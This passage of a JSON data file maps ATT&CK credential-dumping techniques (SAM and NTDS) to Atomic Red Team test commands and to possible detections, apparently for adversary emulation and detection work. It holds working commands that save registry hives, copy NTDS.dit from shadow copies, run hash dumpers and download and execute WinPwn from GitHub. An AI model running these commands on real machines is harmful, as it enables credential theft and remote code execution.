"created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at 
least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003.002", + "command_list": [ + "reg save HKLM\\sam %temp%\\sam\nreg save HKLM\\system %temp%\\system\nreg save HKLM\\security %temp%\\security\n", + "pypykatz live registry\n", + "esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d #{copy_dest}/#{file_name}\n", + "esentutl.exe /y /vss #{file_path} /d #{copy_dest}/SAM\n", + "esentutl.exe /y /vss #{file_path} /d %temp%/#{file_name}\n", + "Write-Host \"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\" -fore green\nImport-Module \"$Env:Temp\\PowerDump.ps1\"\nInvoke-PowerDump", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath $ENV:temp\\#{dumped_hive} 2\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\SAM\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\#{dumped_hive} 2\n", + 
"write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\myhive 2\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = $ENV:temp + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\SAM\"\n$mydump = #{dump_path} + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = #{dump_path} + '\\' + 'myhive'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile -consoleoutput -noninteractive " + ], + 
"commands": [ + { + "command": "reg save HKLM\\sam %temp%\\sam\nreg save HKLM\\system %temp%\\system\nreg save HKLM\\security %temp%\\security\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "pypykatz live registry\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d #{copy_dest}/#{file_name}\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "esentutl.exe /y /vss #{file_path} /d #{copy_dest}/SAM\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "esentutl.exe /y /vss #{file_path} /d %temp%/#{file_name}\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "Write-Host \"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\" -fore green\nImport-Module \"$Env:Temp\\PowerDump.ps1\"\nInvoke-PowerDump", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath $ENV:temp\\#{dumped_hive} 2\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, 
+ { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\SAM\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\#{dumped_hive} 2\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\myhive 2\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = $ENV:temp + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = 
\"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\SAM\"\n$mydump = #{dump_path} + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = #{dump_path} + '\\' + 'myhive'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile -consoleoutput -noninteractive ", + "source": "atomics/T1003.002/T1003.002.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Security Account Manager" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.002", + "display_name": "OS Credential Dumping: Security Account Manager", + "atomic_tests": [ + { + "name": "Registry dump of SAM, creds, and secrets", + "auto_generated_guid": "5c2571d0-1572-416d-9676-812e64ca9f44", + "description": "Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated\nvia three registry keys. 
Then processed locally using https://github.com/Neohapsis/creddump7\n\nUpon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg save HKLM\\sam %temp%\\sam\nreg save HKLM\\system %temp%\\system\nreg save HKLM\\security %temp%\\security\n", + "cleanup_command": "del %temp%\\sam >nul 2> nul\ndel %temp%\\system >nul 2> nul\ndel %temp%\\security >nul 2> nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Registry parse with pypykatz", + "auto_generated_guid": "a96872b2-cbf3-46cf-8eb4-27e8c0e85263", + "description": "Parses registry hives to obtain stored credentials\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Computer must have python 3 installed\n", + "prereq_command": "py -3 --version >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + }, + { + "description": "Computer must have pip installed\n", + "prereq_command": "py -3 -m pip --version >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "echo \"PIP must be installed manually\"\n" + }, + { + "description": "pypykatz must be installed and part of PATH\n", + "prereq_command": "pypykatz -h >nul 2>&1\nexit /b %errorlevel%\n", + "get_prereq_command": "pip install pypykatz\n" + } + ], + "executor": { + "command": "pypykatz live registry\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "esentutl.exe SAM copy", + "auto_generated_guid": "a90c2f4d-6726-444e-99d2-a00cd7c20480", + "description": "Copy the SAM hive using the esentutl.exe utility\nThis can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "Path to the file to 
copy", + "type": "Path", + "default": "%SystemRoot%/system32/config/SAM" + }, + "file_name": { + "description": "Name of the copied file", + "type": "String", + "default": "SAM" + }, + "copy_dest": { + "description": "Destination of the copied file", + "type": "String", + "default": "%temp%" + } + }, + "executor": { + "command": "esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}\n", + "name": "command_prompt", + "elevation_required": true, + "cleanup_command": "del #{copy_dest}\\#{file_name} >nul 2>&1\n" + } + }, + { + "name": "PowerDump Hashes and Usernames from Registry", + "auto_generated_guid": "804f28fc-68fc-40da-b5a2-e9d0bce5c193", + "description": "Executes a hashdump by reading the hashes from the registry.", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "PowerDump script must exist on disk at specified location", + "prereq_command": "if (Test-Path \"$Env:Temp\\PowerDump.ps1\") {exit 0} else {exit 1} ", + "get_prereq_command": "Invoke-Webrequest -Uri \"https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\" -UseBasicParsing -OutFile \"$Env:Temp\\PowerDump.ps1\"" + } + ], + "executor": { + "command": "Write-Host \"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\" -fore green\nImport-Module \"$Env:Temp\\PowerDump.ps1\"\nInvoke-PowerDump", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "dump volume shadow copy hives with certutil", + "auto_generated_guid": "eeb9751a-d598-42d3-b11c-c122d9c3f6c7", + "description": "Dump hives from volume shadow copies with the certutil utility\nThis can be done with a non-admin user account\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dump_path": { + "description": "Path where the hive will be dumped", + "type": "Path", + "default": "$ENV:temp" + }, + "target_hive": { + "description": "Hive you wish to dump", + "type": 
"String", + "default": "SAM" + }, + "dumped_hive": { + "description": "Name of the dumped hive", + "type": "String", + "default": "myhive" + } + }, + "executor": { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\ncertutil -f -v -encodehex $shadowpath #{dump_path}\\#{dumped_hive} 2\n", + "name": "powershell", + "elevation_required": false, + "cleanup_command": "$toremove = #{dump_path} + \"\\\" + '#{dumped_hive}'\nrm $toremove -ErrorAction Ignore\n" + } + }, + { + "name": "dump volume shadow copy hives with System.IO.File", + "auto_generated_guid": "9d77fed7-05f8-476e-a81b-8ff0472c64d0", + "description": "Dump hives from volume shadow copies with System.IO.File\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dump_path": { + "description": "Path where the hive will be dumped", + "type": "Path", + "default": "$ENV:temp" + }, + "target_hive": { + "description": "Hive you wish to dump", + "type": "String", + "default": "SAM" + }, + "dumped_hive": { + "description": "Name of the dumped hive", + "type": "String", + "default": "myhive" + } + }, + "executor": { + "command": "write-host \"\"\n$shadowlist = get-wmiobject win32_shadowcopy\n$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}\n$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]\n$shadowpath = \"\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\" + $maxvolume + \"\\Windows\\System32\\config\\#{target_hive}\"\n$mydump = #{dump_path} + '\\' + '#{dumped_hive}'\n[System.IO.File]::Copy($shadowpath , $mydump)\n", + "name": "powershell", + "elevation_required": false, + "cleanup_command": "$toremove = #{dump_path} + \"\\\" + '#{dumped_hive}'\nrm $toremove 
-ErrorAction Ignore\n" + } + }, + { + "name": "WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes", + "auto_generated_guid": "0c0f5f06-166a-4f4d-bb4a-719df9a01dbb", + "description": "Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile -consoleoutput -noninteractive ", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1003.003", + "command_list": [ + "vssadmin.exe create shadow /for=C:\n", + "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit #{extract_path}\\ntds.dit\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM #{extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM #{extract_path}\\SYSTEM_HIVE\n", + "copy #{vsc_name}\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit\ncopy #{vsc_name}\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM C:\\Windows\\Temp\\SYSTEM_HIVE\n", + "mkdir C:\\Windows\\Temp\\ntds_T1003\nntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\ntds_T1003\" q q\n", + "wmic shadowcopy call create Volume=C:\\\n", + "wmic /node:\"#{target_host}\" shadowcopy call create Volume=C:\\\n", + "wmic /node:\"localhost\" shadowcopy call create Volume=#{drive_letter}\n", + "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss 
c:\\windows\\ntds\\ntds.dit /d #{target_path}\"\n", + "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d c:\\ntds.dit\"\n", + "wmic /node:\"localhost\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}\"\n", + "(gwmi -list win32_shadowcopy).Create('C:\\','ClientAccessible')\n", + "vssadmin.exe create shadow /for=C:\nmklink /D #{symlink_path} \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n", + "vssadmin.exe create shadow /for=#{drive_letter}\nmklink /D C:\\Temp\\vssstore \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n" + ], + "commands": [ + { + "command": "vssadmin.exe create shadow /for=C:\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit #{extract_path}\\ntds.dit\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM #{extract_path}\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM #{extract_path}\\SYSTEM_HIVE\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "copy #{vsc_name}\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit\ncopy #{vsc_name}\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\VSC_SYSTEM_HIVE\nreg save HKLM\\SYSTEM C:\\Windows\\Temp\\SYSTEM_HIVE\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "mkdir C:\\Windows\\Temp\\ntds_T1003\nntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\ntds_T1003\" q q\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic shadowcopy call create Volume=C:\\\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS 
Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"#{target_host}\" shadowcopy call create Volume=C:\\\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"localhost\" shadowcopy call create Volume=#{drive_letter}\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d #{target_path}\"\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"#{target_host}\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d c:\\ntds.dit\"\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "wmic /node:\"localhost\" process call create \"cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}\"\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "(gwmi -list win32_shadowcopy).Create('C:\\','ClientAccessible')\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "vssadmin.exe create shadow /for=C:\nmklink /D #{symlink_path} \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + }, + { + "command": "vssadmin.exe create shadow /for=#{drive_letter}\nmklink /D C:\\Temp\\vssstore \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n", + "source": "atomics/T1003.003/T1003.003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: NTDS" + } + ], + "parsed_datasets": [ + { + "attack_technique": 
"T1003.003", + "display_name": "OS Credential Dumping: NTDS", + "atomic_tests": [ + { + "name": "Create Volume Shadow Copy with vssadmin", + "auto_generated_guid": "dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "drive_letter": { + "description": "Drive letter to source VSC (including colon)", + "type": "String", + "default": "C:" + } + }, + "dependencies": [ + { + "description": "Target must be a Domain Controller\n", + "prereq_command": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions /v ProductType | findstr LanmanNT\n", + "get_prereq_command": "echo Sorry, Promoting this machine to a Domain Controller must be done manually\n" + } + ], + "executor": { + "command": "vssadmin.exe create shadow /for=#{drive_letter}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Copy NTDS.dit from Volume Shadow Copy", + "auto_generated_guid": "c6237146-9ea6-4711-85c9-c56d263a6b03", + "description": "This test is intended to be run on a domain Controller.\n\nThe Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.\n\nThis test requires steps taken in the test \"Create Volume Shadow Copy with vssadmin\".\nA successful test also requires the export of the SYSTEM Registry hive.\nThis test must be executed on a Windows Domain Controller.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vsc_name": { + "description": "Name of Volume Shadow Copy", + "type": "String", + "default": "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1" + }, + "extract_path": { + "description": "Path for extracted NTDS.dit", + "type": "Path", + "default": "C:\\Windows\\Temp" + } + }, + "dependencies": [ + { + "description": "Target must be a Domain 
